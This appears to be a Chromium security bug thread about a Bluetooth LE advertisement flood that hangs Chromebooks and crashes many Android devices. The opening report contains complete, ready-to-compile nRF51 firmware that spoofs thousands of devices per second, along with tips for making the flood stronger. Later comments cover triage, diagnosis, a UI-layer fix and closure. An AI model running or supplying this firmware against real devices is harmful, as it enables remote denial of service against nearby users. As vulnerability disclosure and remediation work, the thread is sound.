Security: bluetooth LE advertisement storm can remotely hang/crash chromebooks, android devices, and some iOS devices with little or no user action needed
Issue description

VULNERABILITY DETAILS
Remote crash of any ChromeOS device with Bluetooth on if any scanning is done (e.g. user opens BT settings, user just turned on Bluetooth, ARC++ app does scanning). This can be done using a very cheap nRF51 dongle with a very simple firmware that basically just advertises as thousands of Bluetooth LE devices at once. Normal Bluetooth stacks (including the one from Nordic meant for that dongle) do not allow this, but crafting the packets by hand and instructing the radio to send them as fast as possible is easy.

VERSION
ChromeOS: all versions, presumably, crash. Definitely M59, M60, M61
Android: most phones tested had various issues. Some FW, some SW.
iOS: iPad Air 2 crashes, iPhone SE does not
Windows 10: no crash ever

REPRODUCTION CASE
The repro case is basically to send out as many LE advertisements as possible while pretending to be different devices. This means sending valid LE ADV_NONCONN_IND packets over channels 37, 38, and 39 with an increasing (or in some other way nonrepeating) MAC address and valid advertising contents. I used: 0x02, 0x01, 0x05, 0x0D, 0x09, 'd', 'm', 'i', 't', 'r', 'y', 'g', 'r', '0', '0', '0', '0'. I also varied the name just to make it easier to spot the fact that this works.
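For readers unfamiliar with the advertising payload quoted above, the bytes are a sequence of length-prefixed AD structures: a Flags field (type 0x01) followed by a Complete Local Name field (type 0x09). The following is a minimal sketch of walking that layout; the helper name find_ad is hypothetical and is not taken from any Bluetooth stack.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Advertising data quoted in the report: Flags, then Complete Local Name. */
static const uint8_t adv_data[] = {
    0x02, 0x01, 0x05,                       /* len=2, type=Flags, value=0x05 */
    0x0D, 0x09, 'd', 'm', 'i', 't', 'r',    /* len=13, type=Complete Local Name */
    'y', 'g', 'r', '0', '0', '0', '0',
};

/*
 * Hypothetical helper: walk the length-prefixed AD structures and return a
 * pointer to the data of the first structure with the given type, or NULL.
 * Each structure is: 1 length byte (covering type + data), 1 type byte, data.
 */
static const uint8_t *find_ad(const uint8_t *data, size_t len,
                              uint8_t type, size_t *out_len)
{
    size_t pos = 0;

    assert(data != NULL && out_len != NULL);
    while (pos < len) {
        size_t field_len = data[pos];

        /* A zero length ends the data; a field past the end is malformed. */
        if (field_len == 0 || pos + 1 + field_len > len)
            return NULL;
        if (data[pos + 1] == type) {
            *out_len = field_len - 1;       /* exclude the type byte */
            return &data[pos + 2];
        }
        pos += 1 + field_len;
    }
    return NULL;
}
```

Looking up type 0x09 in adv_data yields the 12-byte name "dmitrygr0000", and the 17 bytes of advertising data plus the 6-byte address account for the 0x17 payload length used in the firmware.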
The dongle I used to reproduce the issue is this one: https://www.digikey.com/product-detail/en/nordic-semiconductor-asa/NRF51-DONGLE/1490-1037-ND/5022448

The code you can compile for it to reproduce the issue is as follows:

#include <stdbool.h>
#include <stdint.h>
#include "nrf.h"

static void sendpackets(void)
{
	static const uint8_t chNums[] = {37, 38, 39};
	static const uint8_t chFreqs[] = {2, 26, 80};
	uint32_t i, ctr = 0, chIdx = 100; //chIdx out of range to start things well; ctr must start initialized
	volatile uint8_t pkt[] = { //volatile bc else compiler assumes we do not read it and removes writes
		0x42, //PDU type, random addr
		0x17, //0x17 bytes of payload
		0x00, 0x00, 0x00, 0x00, 0x00, 0xDD, //mac address
		0x02, 0x01, 0x05, //flags: le only, limited discovery
		0x0D, 0x09, 'd', 'm', 'i', 't', 'r', 'y', 'g', 'r', //name
		'0', '0', '0', '0',
	};

	while(1) {
		if (++chIdx >= 3) {
			chIdx = 0;
			ctr++;

			//vary name
			for (i = 0; i < 4; i++) {
				static const char hexch[64] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz#*"; //base64-ish
				pkt[sizeof(pkt) - 1 - i] = hexch[(ctr >> (i * 6)) & 0x3F];
			}

			//vary MAC addr
			for (i = 0; i < 4; i++)
				pkt[i + 2] = ctr >> (8 * i);
		}

		NRF_RADIO->FREQUENCY = chFreqs[chIdx];
		NRF_RADIO->DATAWHITEIV = chNums[chIdx]; //unused for now
		NRF_RADIO->PACKETPTR = (uint32_t)pkt;
		NRF_RADIO->EVENTS_DISABLED = 0;
		NRF_RADIO->TASKS_TXEN = 1;
		while (!NRF_RADIO->EVENTS_DISABLED);
	}
}

void main(void)
{
	//init clocks (our crystal is 16mhz)
	NRF_CLOCK->XTALFREQ = 0xFFFFFFFF; //external crystal is 16MHz
	NRF_CLOCK->TASKS_HFCLKSTART = 1; //start hf clock
	while (!NRF_CLOCK->EVENTS_HFCLKSTARTED); //wait for clock start

	//trim radio for best reception if trim values present in FICR
	if (NRF_FICR->BLE_1MBIT[4] & 0x80000000) {
		NRF_RADIO->OVERRIDE0 = NRF_FICR->BLE_1MBIT[0];
		NRF_RADIO->OVERRIDE1 = NRF_FICR->BLE_1MBIT[1];
		NRF_RADIO->OVERRIDE2 = NRF_FICR->BLE_1MBIT[2];
		NRF_RADIO->OVERRIDE3 = NRF_FICR->BLE_1MBIT[3];
		NRF_RADIO->OVERRIDE4 = NRF_FICR->BLE_1MBIT[4];
	}

	//init radio
	NRF_RADIO->MODE = 3; //BLE 1Mbit mode
	NRF_RADIO->PCNF0 = 0x00108; //length is 8 bits long, S0 is one byte
	NRF_RADIO->PCNF1 = 0x0203007f; //no whitening, 3 byte addr, no static data
	NRF_RADIO->CRCCNF = 0x103; //3-byte crc skipping address
	NRF_RADIO->CRCINIT = 0x00555555; //proper crc settings for BLE
	NRF_RADIO->CRCPOLY = 0x0000065B; //proper crc settings for BLE
	NRF_RADIO->TIFS = 0; //no inter-packet spacing, hahaha!
	NRF_RADIO->SHORTS = 3; //shortcut for ready to start and for end to disable
	NRF_RADIO->BASE0 = 0x89BED600; //split between 3 bytes here and one in prefix...
	NRF_RADIO->PREFIX0 = 0x8E; //actually postfix...
	NRF_RADIO->TXADDRESS = 0; //use address index 0
	NRF_RADIO->TXPOWER = 4; //4dBm (max power)

	sendpackets();
}

With this code, the dongle will send out approximately 2400 advertisements per second, across three channels. This means that any device scanning in the vicinity will feel as if it discovered 800 new devices per second. The attack can be improved by using three dongles, each tuned to a particular channel, thus skipping the frequency hopping need and improving efficiency 3x.

In some devices (Android, some Intel-7265 based Chromebooks) this overwhelms the Bluetooth chip and it ceases to work, requiring a power cycle. This does not happen each time, but does often. In devices where the chip survives, the kernel will start using a lot of CPU trying to keep track of all these devices. Within seconds of being near this device, Android devices will generally start seeing Bluetooth stacks crash. Chromebooks whose users initiate an LE scan (for example by clicking "bluetooth" to "on" in preferences) will immediately see their entire UI hang. Within seconds all keys on the device become nonresponsive (even ctrl + alt + refresh to switch to a text console no longer has any effect). If the device is not removed from the vicinity of the dongle, it will sometimes eventually self-reboot. Sometimes leaving the vicinity of the dongle can help, sometimes it is too late.
For Android, sometimes the devices manage to not crash and instead get very, very slow. Those will usually recover when they leave the radio range of the dongle. But most users will have force-rebooted them by then, as their UI will have appeared hung this entire time.

Newer iOS devices appear to not crash when near such a device, but some repros have been obtained by pretending to be an iBeacon. No further work went into testing iOS.

The main cause is that the pipelines handling advertisements in various BT stacks were simply not meant to handle 800 devices per second and an ever-increasing total number of "seen" devices. This causes high CPU and memory usage, leading to hangs and crashes. To mitigate, memory limits need to be put in place and packets rate-limited as early as possible, so that as little CPU as possible is wasted dropping them. Currently in ChromeOS each packet is sent from hardware to driver, to BlueZ in the kernel, to userspace. All of this uses hundreds of thousands of CPU cycles per seen device. Furthermore, bluetoothd, dbus, and the ChromeOS UI keep a COMPLETE list of recently seen devices. This cache does expire, but only after many minutes, allowing us to easily make it occupy a lot of memory and make operations on it very slow.

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: hang: ui, sometimes, kernel, sometimes firmware
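The rate-limiting mitigation proposed in the description could be sketched as a token bucket placed as early as possible in the advertisement path, so that excess reports are dropped with a few integer operations instead of travelling up to userspace. This is only an illustration under assumptions: the struct, the function names, and the limits are hypothetical and do not come from BlueZ or any driver.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical token bucket for advertisement reports (not a real stack API). */
struct adv_limiter {
    uint32_t capacity;      /* largest burst of reports let through */
    uint32_t rate_per_sec;  /* sustained reports per second */
    uint32_t tokens;        /* reports that may still pass right now */
    uint64_t last_ms;       /* time up to which tokens have been credited */
};

static void adv_limiter_init(struct adv_limiter *l, uint32_t capacity,
                             uint32_t rate_per_sec, uint64_t now_ms)
{
    assert(l != NULL && capacity > 0 && rate_per_sec > 0);
    l->capacity = capacity;
    l->rate_per_sec = rate_per_sec;
    l->tokens = capacity;
    l->last_ms = now_ms;
}

/* Returns true if this report should be processed, false if it is dropped. */
static bool adv_limiter_allow(struct adv_limiter *l, uint64_t now_ms)
{
    uint64_t elapsed = now_ms - l->last_ms;
    uint64_t refill = elapsed * l->rate_per_sec / 1000;

    if (refill > 0) {
        uint64_t total = (uint64_t)l->tokens + refill;

        l->tokens = total > l->capacity ? l->capacity : (uint32_t)total;
        /* Advance only by the time converted into whole tokens. */
        l->last_ms += refill * 1000 / l->rate_per_sec;
    }
    if (l->tokens == 0)
        return false;
    l->tokens--;
    return true;
}
```

With a capacity of 10 and a rate of 50 per second (both arbitrary), a flood of 800 reports per second would be cut down to roughly 50 processed reports per second after the initial burst; the remaining reports cost only the check above.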
,
Sep 14 2017
,
Sep 15 2017
Thanks for the detailed writeup.

The hardware lockups you are seeing are likely indicating firmware crashes. We'll need to work with the hardware vendors to resolve these. Let's start a list of BT chips that we have observed locking up. I've started a spreadsheet here: https://docs.google.com/spreadsheets/d/1SBrmGkQsZAdl4gw1jS9cRzFdXE3i6AHngzFGyMz7-RY/edit#gid=0 Dmitry, can you fill in the data points you already have?

The spontaneous reboots you're seeing are probably a result of kernel panics. In the worst case, these are due to crashes and can be exploited to obtain remote code execution. In the best case, this is just the kernel hitting an OOM situation it can't handle and giving up. That'd be merely a denial of service attack.

Regarding the userspace hangs, these are probably "just" denial-of-service AFAICT.

Let me try to assess severity:
- The hardware lockups (and potential firmware RCE) are severity-high assuming the bluetooth hardware isn't DMA-capable (which I don't have a full picture on, but a few quick spot checks suggest that assumption is correct).
- The kernel panics/crashes are severity-critical if they allow RCE, severity-high if only DoS.
- Userspace lockups are most likely DoS only. (Note that I consider the DoS in this case severity-high, since it can be triggered remotely and makes the machine unusable.)

Given the uncertainty regarding the kernel panics/crashes, I'll set severity-critical for now.
,
Sep 15 2017
Breaking out bugs for individual issues:
- hardware lockups - let's file individual bugs as details for BT chips become available
- kernel panics - issue 765605
- userspace - unclear whether we need a bug if we cap number of devices in the kernel already
,
Sep 15 2017
This is a critical security issue. If you are not able to fix this quickly, please revert the change that introduced it. If this doesn't affect a release branch, or has not been properly classified for severity, please update the Security_Impact or Security_Severity labels, and remove the ReleaseBlock label. To disable this altogether, apply ReleaseBlock-NA. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Sep 15 2017
,
Sep 15 2017
This is ongoing internal research on a potentially-critical security issue. No need to hold releases at this time.
,
Sep 15 2017
I am not sure if we are seeing FW lockups here. FW getting fubar'ed would cause us to lose the BT adapter, but not a hang or a reboot. Our only interaction with the FW is over HCI, which is an async protocol.
,
Sep 15 2017
FWIW, firmware crashes in other hardware I have seen cause similar behavior - the device still being present but not servicing requests with code accessing the device potentially hanging. My understanding is that machines in this state did actually not reboot (otherwise it wouldn't have been possible to investigate and find that the BT hardware is stuck and not functioning any longer).
,
Sep 15 2017
,
Sep 15 2017
I actually said that incorrectly. I don't believe that FW lockups are _causing_ the hang. The FW could very well be locked up also, but the only effect that would have is that if the user tried to "use" Bluetooth, that would fail. The OS would work just fine otherwise. In fact, if the FW locks up, that is a better situation for the device to be in, since it will no longer be overloading the kernel with new events. Since the kernel is locking up, I suspect the FW is just fine and continuing to DoS our kernel :)
,
Sep 15 2017
,
Sep 15 2017
,
Sep 15 2017
In some cases I did see FW lock up, in most kernel seems to
,
Sep 18 2017
dmitrygr@, rkc@, are there any updates on this bug? It seems we haven't yet found out what caused the hang and DoS. Is there anything I can help with?
,
Sep 20 2017
We do need an owner for this critical bug. Any volunteers? :)
,
Sep 20 2017
Ha, me I guess
,
Sep 20 2017
I'll keep looking at the kernel aspects.
,
Sep 20 2017
,
Sep 20 2017
Note that we can downgrade this from Critical if/when we confirm that this is not a kernel RCE vector.
,
Sep 20 2017
#20: I think we'll need more data before concluding that. We may need kernel mitigation to limit packet flooding to userspace.

Observations so far (on eve, with chromeos-4.12):
- Kernel is stable.
- As soon as attack starts, the chrome main process goes to 100% CPU. It never recovers. Normally it is waiting on an epoll; that is no longer seen after the attack started.
- bluetoothd is initially at ~80% or more CPU, but drops to 0% after some time. This happens faster on x86 (eve, cyan) than on kevin, but is seen there as well. This may suggest a firmware hang, but that is difficult to determine w/o working UI.
- binder errors may be seen after some time, possibly due to killed threads. Most are related to pending transactions, but I observed one "BUG: sleeping function called" in binder after ~15 hours uptime; I'll file a bug for that.
,
Sep 26 2017
,
Sep 26 2017
,
Oct 4 2017
dmitrygr: Uh oh! This issue still open and hasn't been updated in the last 14 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers? If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one? If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Oct 6 2017
dmitrygr: What's the status here? If you don't have time to work on this, who else on the BT team can pick this up?
,
Oct 15 2017
We commit ourselves to a 30 day deadline for fixing for critical severity vulnerabilities, and have exceeded it here. If you're unable to look into this soon, could you please find another owner or remove yourself so that this gets back into the security triage queue? For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Oct 18 2017
dmitrygr: Uh oh! This issue still open and hasn't been updated in the last 28 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers? If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one? If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Oct 31 2017
The main issue seems to be in chrome: the UI dies first (by running itself out of memory) before the kernel and bluetoothd can die, so this needs to be reassigned to the chrome UI team. If and when chrome is fixed, we can re-evaluate whether we need to fix any lower layers (they may get a chance to fail if chrome doesn't fail first).

Sending to rkc@ because he might know who the relevant chrome UI people might be.
,
Oct 31 2017
,
Nov 1 2017
,
Nov 2 2017
Re comment 28: Can't you just switch BT on, then kill the UI on a device (in dev mode), then repro the attack?
,
Nov 6 2017
In Chrome, this is a performance/usability issue, not a security issue. We should file a separate issue to sanity check the number of devices we load in the UI. *This* issue in particular is a security issue. As Mattias mentioned, it should still be repro-able by simply doing stop ui and starting a scan via bluetoothctl.
,
Nov 9 2017
I did look into this more this week. In all cases, the only process that doesn't recover after leaving the area with flooding packets is the chrome UI process. The UI basically hangs itself. Bluetoothd recovers in tens of seconds. The chrome process eats CPU and is unresponsive forever. The fix is needed in the UI layer. Other processes seem to cope with this attack given time to recover outside of radio range. After the UI is fixed, we can consider whether we want to do more (for example, to allow continued Chromebook operation INSIDE radio range of the attack).
,
Nov 9 2017
So then is this still a security issue? I guess maybe a DoS?
,
Nov 9 2017
Sarah, could you pick this up?
,
Nov 9 2017
,
Nov 10 2017
I tried limiting the number of devices to 20. With that, the bluetooth settings page no longer freezes, but the system tray still does. I'm investigating why.
,
Nov 11 2017
The system tray seems to re-create the bluetooth list every time there's an update to one of the devices in the list. Updating the UI that frequently could be expensive, so I've added a timer to limit the frequency. CL: https://chromium-review.googlesource.com/c/chromium/src/+/765014
,
Nov 11 2017
,
Nov 13 2017
Thanks Sarah! Could we maybe update the list instead of re-creating it?
,
Nov 13 2017
,
Nov 14 2017
,
Nov 14 2017
Re comment #33: Can you clarify whether bluetoothd runs into OOM or crashes otherwise? Your comment suggests that is not the case, but I'd like to confirm. If it does not, then we can downgrade this to Security_Impact-Low. I'd still expect bluetoothd to handle this gracefully (i.e. not lock up - your comment suggests something bad is happening if there's a need to "recover"), but that's just a regular bug.
,
Nov 14 2017
We commit ourselves to a 60 day deadline for fixing for high severity vulnerabilities, and have exceeded it here. If you're unable to look into this soon, could you please find another owner or remove yourself so that this gets back into the security triage queue? For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Nov 14 2017
Speaking with ortuno@ about it more; I don't think the correct fix is in Chrome. Even though it can work, getting out of sync with devices that BlueZ knows about doesn't seem like a good solution. Let us instead fix this in BlueZ. Given that Sarah has no experience with BlueZ, can someone in the Systems Bluetooth team pick this up?
,
Nov 29 2017
,
Nov 30 2017
The following revision refers to this bug:
https://chromium.googlesource.com/chromium/src.git/+/3c11bd5df40407310a1ebb31904a4fe819c342d0

commit 3c11bd5df40407310a1ebb31904a4fe819c342d0
Author: Sarah Hu <xiaoyinh@chromium.org>
Date: Thu Nov 30 01:06:49 2017

cros: limit number of bluetooth devices in the UI.

If we intentionally send a lot of bluetooth advertisements (like 1000 per second), the chromeOS UI will keep updating new devices and eventually run out of memory. This CL set maximum number of bluetooth devices to be 50 also adds a timer to avoid frequently update the system tray UI.

Bug: 765371
Cq-Include-Trybots: master.tryserver.chromium.linux:closure_compilation
Change-Id: I1485d690a3e66b8580c2d0296c3297334a6a219a
Reviewed-on: https://chromium-review.googlesource.com/765014
Reviewed-by: Rahul Chaturvedi <rkc@chromium.org>
Reviewed-by: James Cook <jamescook@chromium.org>
Reviewed-by: Steven Bennetts <stevenjb@chromium.org>
Commit-Queue: Xiaoyin Hu <xiaoyinh@chromium.org>
Cr-Commit-Position: refs/heads/master@{#520359}

[modify] https://crrev.com/3c11bd5df40407310a1ebb31904a4fe819c342d0/ash/system/bluetooth/tray_bluetooth.cc
[modify] https://crrev.com/3c11bd5df40407310a1ebb31904a4fe819c342d0/ash/system/bluetooth/tray_bluetooth_helper.cc
[modify] https://crrev.com/3c11bd5df40407310a1ebb31904a4fe819c342d0/chrome/browser/resources/settings/bluetooth_page/bluetooth_subpage.js
[modify] https://crrev.com/3c11bd5df40407310a1ebb31904a4fe819c342d0/chrome/test/data/webui/settings/bluetooth_page_tests.js
[modify] https://crrev.com/3c11bd5df40407310a1ebb31904a4fe819c342d0/chrome/test/data/webui/settings/fake_bluetooth.js
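The two ideas named in the commit message, a cap of 50 devices and a timer that limits how often the tray is rebuilt, can be illustrated with a small sketch. This is not the code from the CL (which changes C++ and JavaScript files in Chromium); the names, the drop-when-full policy, and the one-second interval are assumptions made for illustration only.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MAX_UI_DEVICES 50    /* cap stated in the commit message */
#define MIN_REFRESH_MS 1000  /* assumed interval; the commit does not state one */

/* Hypothetical bounded device list with a coalesced refresh. */
struct device_list {
    uint8_t addr[MAX_UI_DEVICES][6];
    size_t count;
    bool dirty;                 /* list changed since the last refresh */
    uint64_t last_refresh_ms;
    unsigned refreshes;         /* stand-in for actual UI rebuilds */
};

/* Returns true if the device is tracked, false if dropped because the list is full. */
static bool device_list_add(struct device_list *l, const uint8_t addr[6])
{
    assert(l != NULL && addr != NULL);
    for (size_t i = 0; i < l->count; i++)
        if (memcmp(l->addr[i], addr, 6) == 0)
            return true;        /* already known, nothing to redraw */
    if (l->count == MAX_UI_DEVICES)
        return false;           /* assumed policy: ignore devices past the cap */
    memcpy(l->addr[l->count++], addr, 6);
    l->dirty = true;
    return true;
}

/* Called periodically; rebuilds at most once per MIN_REFRESH_MS, and only if dirty. */
static bool device_list_tick(struct device_list *l, uint64_t now_ms)
{
    assert(l != NULL);
    if (!l->dirty || now_ms - l->last_refresh_ms < MIN_REFRESH_MS)
        return false;
    l->dirty = false;
    l->last_refresh_ms = now_ms;
    l->refreshes++;
    return true;
}
```

Under this sketch, memory is bounded by the fixed array, and a burst of new devices results in a single rebuild per interval rather than one rebuild per advertisement.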
,
Nov 30 2017
The fix is landed in the UI layer. Is there anything left for this issue?
,
Nov 30 2017
Since this doesn't cause a hang anymore, I would consider this fixed.
,
Dec 1 2017
,
Dec 4 2017
,
Dec 15 2017
,
Dec 15 2017
This bug requires manual review: M64 has already been promoted to the beta branch, so this requires manual review. Please contact the milestone owner if you have questions. Owners: cmasso@(Android), cmasso@(iOS), kbleicher@(ChromeOS), abdulsyed@(Desktop) For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Dec 15 2017
CL in comment# 47 initially landed in 64.0.3281.0. No need to merge.
,
Dec 18 2017
,
Jan 22 2018
,
Mar 9 2018
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Mar 27 2018
,
Sep 26
Comment 1 by dmitrygr@google.com
, Sep 14 2017